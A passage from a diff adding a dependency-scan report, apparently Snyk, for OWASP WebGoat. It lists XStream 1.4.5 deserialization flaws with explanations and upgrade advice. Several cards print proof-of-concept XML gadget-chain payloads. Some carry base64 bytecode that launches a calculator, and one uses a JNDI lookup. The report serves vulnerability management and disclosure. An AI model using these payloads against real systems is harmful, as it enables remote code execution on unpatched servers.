+        &lt;dataSource class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource&#39;&gt;
+          &lt;is class=&#39;java.io.ByteArrayInputStream&#39;&gt;
+            &lt;buf&gt;&lt;/buf&gt;
+            &lt;pos&gt;-2147483648&lt;/pos&gt;
+            &lt;mark&gt;0&lt;/mark&gt;
+            &lt;count&gt;0&lt;/count&gt;
+          &lt;/is&gt;
+          &lt;consumed&gt;false&lt;/consumed&gt;
+        &lt;/dataSource&gt;
+        &lt;transferFlavors/&gt;
+      &lt;/dataHandler&gt;
+      &lt;dataLen&gt;0&lt;/dataLen&gt;
+    &lt;/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference=&#39;../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&#39;/&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.</p><p>An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.</p><p>&gt; Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java&#39;s strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer&#39;s control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).</p><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.16 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2021-21341.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="http://x-stream.github.io/changes.html#1.4.16" target="_blank" rel="noopener noreferrer">XStream Changelog</a></li><li><a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">XStream Workaround</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088337" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">275</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569176</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;com.sun.java.util.jar.pack.PackageWriter$2&#39;&gt;
+        &lt;outer-class&gt;
+          &lt;verbose&gt;0&lt;/verbose&gt;
+          &lt;effort&gt;0&lt;/effort&gt;
+          &lt;optDumpBands&gt;false&lt;/optDumpBands&gt;
+          &lt;optDebugBands&gt;false&lt;/optDebugBands&gt;
+          &lt;optVaryCodings&gt;false&lt;/optVaryCodings&gt;
+          &lt;optBigStrings&gt;false&lt;/optBigStrings&gt;
+          &lt;isReader&gt;false&lt;/isReader&gt;
+          &lt;bandHeaderBytePos&gt;0&lt;/bandHeaderBytePos&gt;
+          &lt;bandHeaderBytePos0&gt;0&lt;/bandHeaderBytePos0&gt;
+          &lt;archiveOptions&gt;0&lt;/archiveOptions&gt;
+          &lt;archiveSize0&gt;0&lt;/archiveSize0&gt;
+          &lt;archiveSize1&gt;0&lt;/archiveSize1&gt;
+          &lt;archiveNextCount&gt;0&lt;/archiveNextCount&gt;
+          &lt;attrClassFileVersionMask&gt;0&lt;/attrClassFileVersionMask&gt;
+          &lt;attrIndexTable class=&#39;com.sun.javafx.fxml.BeanAdapter&#39;&gt;
+            &lt;bean class=&#39;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&#39; serialization=&#39;custom&#39;&gt;
+              &lt;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&gt;
+                &lt;default&gt;
+                  &lt;__name&gt;Pwnr&lt;/__name&gt;
+                  &lt;__bytecodes&gt;
+                    &lt;byte-array&gt;yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==&lt;/byte-array&gt;
+                    &lt;byte-array&gt;yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ&lt;/byte-array&gt;
+                  &lt;/__bytecodes&gt;
+                  &lt;__transletIndex&gt;-1&lt;/__transletIndex&gt;
+                  &lt;__indentNumber&gt;0&lt;
+</code></pre></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569176" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">557</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569177</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;dynamic-proxy&gt;
+      &lt;interface&gt;java.lang.Comparable&lt;/interface&gt;
+      &lt;handler class=&#39;com.sun.xml.internal.ws.client.sei.SEIStub&#39;&gt;
+        &lt;owner/&gt;
+        &lt;managedObjectManagerClosed&gt;false&lt;/managedObjectManagerClosed&gt;
+        &lt;databinding class=&#39;com.sun.xml.internal.ws.db.DatabindingImpl&#39;&gt;
+          &lt;stubHandlers&gt;
+            &lt;entry&gt;
+              &lt;method&gt;
+                &lt;class&gt;java.lang.Comparable&lt;/class&gt;
+                &lt;name&gt;compareTo&lt;/name&gt;
+                &lt;parameter-types&gt;
+                  &lt;class&gt;java.lang.Object&lt;/class&gt;
+                &lt;/parameter-types&gt;
+              &lt;/method&gt;
+              &lt;com.sun.xml.internal.ws.client.sei.StubHandler&gt;
+                &lt;bodyBuilder class=&#39;com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit&#39;&gt;
+                  &lt;indices&gt;
+                    &lt;int&gt;0&lt;/int&gt;
+                  &lt;/indices&gt;
+                  &lt;getters&gt;
+                    &lt;com.sun.xml.internal.ws.client.sei.ValueGetter&gt;PLAIN&lt;/com.sun.xml.internal.ws.client.sei.ValueGetter&gt;
+                  &lt;/getters&gt;
+                  &lt;accessors&gt;
+                    &lt;com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2&gt;
+                      &lt;val_-isJAXBElement&gt;false&lt;/val_-isJAXBElement&gt;
+                      &lt;val_-getter class=&#39;com.sun.xml.internal.ws.spi.db.FieldGetter&#39;&gt;
+                        &lt;type&gt;int&lt;/type&gt;
+                        &lt;field&gt;
+                          &lt;name&gt;hash&lt;/name&gt;
+                          &lt;clazz&gt;java.lang.String&lt;/clazz&gt;
+                        &lt;/field&gt;
+                      &lt;/val_-getter&gt;
+                      &lt;val_-isListType&gt;false&lt;/val_-isListType&gt;
+                      &lt;val_-n&gt;
+                        &lt;namespaceURI/&gt;
+                        &lt;localPart&gt;hash&lt;/localPart&gt;
+                        &lt;prefix/&gt;
+                      &lt;/val_-n&gt;
+                      &lt;val_-setter class=&#39;com.sun.xml.internal.ws.spi.db.MethodSetter&#39;&gt;
+                        &lt;type&gt;java.lang.String&lt;/type&gt;
+                        &lt;method&gt;
+                          &lt;class&gt;javax.naming.InitialContext&lt;/class&gt;
+                          &lt;name&gt;doLookup&lt;/name&gt;
+                          &lt;parameter-types&gt;
+                            &lt;class&gt;java.lang.String&lt;/class&gt;
+                          &lt;/parameter-types&gt;
+                        &lt;/method&gt;
+                      &lt;/val_-setter&gt;
+                      &lt;outer-class&gt;
+                        &lt;propertySetters&gt;
+                          &lt;entry&gt;
+                            &lt;string&gt;serialPersistentFields&lt;/string&gt;
+                            &lt;com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                              &lt;type&gt;[Ljava.io.ObjectStreamField;&lt;/type&gt;
+                              &lt;field&gt;
+                                &lt;name&gt;serialPersistentFields&lt;/name&gt;
+                                &lt;clazz&gt;java.lang.String&lt;/clazz&gt;
+                              &lt;/field&gt;
+                            &lt;/com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                          &lt;/entry&gt;
+                          &lt;entry&gt;
+                            &lt;string&gt;CASE_INSENSITIVE_ORDER&lt;/string&gt;
+                            &lt;com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                              &lt;type&gt;java.util.Comparator&lt;/type&gt;
+                              &lt;field&gt;
+                                &lt;name&gt;CASE_INSENSITIVE_ORDER&lt;/name&gt;
+                                &lt;clazz&gt;java.lang.String&lt;/clazz&gt;
+                              &lt;/field&gt;
+                            &lt;/com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                          &lt;/entry&gt;
+                          &lt;entry&gt;
+                            &lt;string&gt;serialVersionUID&lt;/string&gt;
+                            &lt;com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                              &lt;type&gt;long&lt;/type&gt;
+                              &lt;field&gt;
+                                &lt;name&gt;serialVersionUID&lt;/name&gt;
+                                &lt;clazz&gt;java.lang.String&lt;/clazz&gt;
+                              &lt;/field&gt;
+                            &lt;/com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                          &lt;/entry&gt;
+                          &lt;entry&gt;
+                            &lt;string&gt;value&lt;/string&gt;
+                            &lt;com.sun.xml.internal.ws.spi.db.FieldSetter&gt;
+                              &lt;type&gt;[
+</code></pre></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569177" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">275</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569178</li>
+      <li class="card-meta-item">CWE-94</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below.  However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;linked-hash-set&gt;
+  &lt;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization=&#39;custom&#39;&gt;
+    &lt;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&gt;
+      &lt;default&gt;
+        &lt;__name&gt;Pwnr&lt;/__name&gt;
+        &lt;__bytecodes&gt;
+          &lt;byte-array&gt;yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=&lt;/byte-array&gt;
+          &lt;byte-array&gt;yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ&lt;/byte-array&gt;
+        &lt;/__bytecodes&gt;
+        &lt;__transletIndex&gt;-1&lt;/__transletIndex&gt;
+        &lt;__indentNumber&gt;0&lt;/__indentNumber&gt;
+      &lt;/default&gt;
+    &lt;/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&gt;
+  &lt;/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&gt;
+  &lt;dynamic-proxy&gt;
+    &lt;interface&gt;javax.xml.transform.Templates&lt;/interface&gt;
+    &lt;handler class=&#39;sun.reflect.annotation.AnnotationInvocationHandler&#39; serialization=&#39;custom&#39;&gt;
+      &lt;sun.reflect.annotation.AnnotationInvocationHandler&gt;
+        &lt;default&gt;
+          &lt;memberValues&gt;
+            &lt;entry&gt;
+              &lt;string&gt;f5a5a608&lt;/string&gt;
+              &lt;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference=&#39;../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&#39;/&gt;
+            &lt;/entry&gt;
+          &lt;/memberValues&gt;
+          &lt;type&gt;javax.xml.transform.Templates&lt;/type&gt;
+        &lt;/default&gt;
+      &lt;/sun.reflect.annotation.AnnotationInvocationHandler&gt;
+    &lt;/handler&gt;
+  &lt;/dynamic-proxy&gt;
+&lt;/linked-hash-set&gt;
+</code></pre><pre><code>XStream xstream = new XStream();
+xstream.f
+</code></pre></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569178" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">275</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Arbitrary Code Execution</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179</li>
+      <li class="card-meta-item">CWE-434</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;javax.swing.event.EventListenerList serialization=&#39;custom&#39;&gt;
